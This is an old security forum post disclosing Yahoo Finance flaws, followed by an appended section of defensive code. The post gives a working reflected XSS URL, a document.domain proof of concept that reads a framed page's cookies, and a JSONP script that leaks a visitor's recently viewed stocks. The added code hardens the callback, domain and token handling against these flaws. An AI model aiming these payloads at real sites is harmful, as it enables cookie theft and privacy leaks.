Sla.ckers.org
Yahoo Finance vulnerabilities
Posted by: trev
Date: March 18, 2007 11:39AM

I noticed a very helpful ad script on Yahoo Finance: [ads.finance.yahoo.com]. If you look at the source code, there is an error message that will guide you through the required parameters :)

Unfortunately it will not mention a very nifty optional parameter called "cbk". Why require hackers to break out of strings? Let them inject JavaScript code directly!

http://ads.finance.yahoo.com/yfs_adds?f=97469771&p=finance&cbk=window.alert(/XSS/.source)&l=nada

There is more. Another optional parameter called "dd" will make this page set document.domain - to whatever you like. Yes, we have seen it before. It can be exploited from any .com domain in exactly the same way:

<script>
  document.domain = "com";
  function ownMe() {
    alert(frames[0].document.cookie);
  }
</script>
<iframe src="http://ads.finance.yahoo.com/yfs_adds?f=97469771&p=finance&cbk=ownMe&l=nada&dd=com"></iframe>

Interestingly, I found almost exactly the same script in Yahoo Mail Beta - but it cannot be exploited. It ignores the dd parameter and only accepts predefined values for cbk. There are a few other parameters that are echoed into the JavaScript code - but all are checked properly.

Finally a small information disclosure hole:

http://finance.yahoo.com/services/1.0/instrument//leftpanelinfo?callback=whatever

With this script one can read out which stocks the user has been looking at:

<script>
  function dump(data) {
    document.writeln("Have been visiting Yahoo Finance recently? Here is what you looked at:<br><br>");
    // each entry of recentsymbols is an object with a "name" field
    for (var i = 0; i < data.recentsymbols.length; i++)
      document.writeln(data.recentsymbols[i].name + "<br>");
  }
</script>
<script src="http://finance.yahoo.com/services/1.0/instrument//leftpanelinfo?callback=dump"></script>

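An added example, not code from trev's post or from Yahoo: a minimal model of the two server-side mistakes described above (a cbk/callback parameter echoed straight into JavaScript, and a dd parameter that sets document.domain to whatever the URL says), each beside a hardened version, plus a token check of the kind that would have closed the recent-symbols leak. The function names, the allowlists, the session token and the sample data are assumptions made for the example.

```javascript
// Added example, not from the original post or from Yahoo. Models a JSONP
// endpoint like the one discussed: a "cbk"/"callback" parameter echoed into
// JavaScript and a "dd" parameter controlling document.domain. Function
// names, allowlists, the session token and the sample data are assumptions.

// A JSONP callback must be a plain (optionally dotted) identifier. Anything
// else, e.g. "window.alert(/XSS/.source)", is code, not a name.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

// JSON.stringify output is valid JS, but for a script-context response we
// also escape "<", ">" and the U+2028/U+2029 line terminators, which legacy
// engines treat as newlines even inside string literals.
function jsonForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Vulnerable: the callback is concatenated verbatim, so the attacker
// controls the first statement of the response (the cbk bug above).
function buildJsonpVulnerable(callback, payload) {
  return callback + "(" + JSON.stringify(payload) + ");";
}

// Hardened: reject anything that is not an identifier and, optionally,
// anything outside a fixed allowlist (the behaviour the post observed in
// Yahoo Mail Beta). Returns null when the request must be refused.
function buildJsonpSafe(callback, payload, allowlist) {
  if (typeof callback !== "string" || !CALLBACK_RE.test(callback)) return null;
  if (Array.isArray(allowlist) && !allowlist.includes(callback)) return null;
  return callback + "(" + jsonForScript(payload) + ");";
}

// document.domain relaxation (the dd bug above). Accept only the serving
// host itself or a label-boundary suffix of it with at least two labels, so
// a bare "com" is refused; modern browsers refuse public suffixes themselves,
// but the server should not depend on that. An allowlist can narrow it further.
function safeDocumentDomain(requested, host, allowlist) {
  if (typeof requested !== "string" || !/^[a-z0-9.-]+$/i.test(requested)) return null;
  const r = requested.toLowerCase();
  const h = host.toLowerCase();
  if (r !== h && !h.endsWith("." + r)) return null;
  if (r.split(".").length < 2) return null;
  if (Array.isArray(allowlist) && !allowlist.includes(r)) return null;
  return r;
}

// Per-user data (the recent-symbols list) must not go out in a script that
// any third-party page can load. Require a per-session token in the query,
// compared without stopping at the first mismatched byte.
function tokensMatch(a, b) {
  if (typeof a !== "string" || typeof b !== "string" || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Assumed shape: query = { callback, token }, session = { token, recentsymbols }.
function serveRecentSymbols(query, session) {
  if (!tokensMatch(query.token, session.token)) return null;
  return buildJsonpSafe(query.callback, { recentsymbols: session.recentsymbols });
}
```

With the attacker's cbk value from the post, buildJsonpVulnerable returns a script whose first statement is window.alert(/XSS/.source)(...), while buildJsonpSafe returns null; safeDocumentDomain("com", "ads.finance.yahoo.com") is null, and serveRecentSymbols only answers a request that carries the session's token, which a page on another origin cannot obtain.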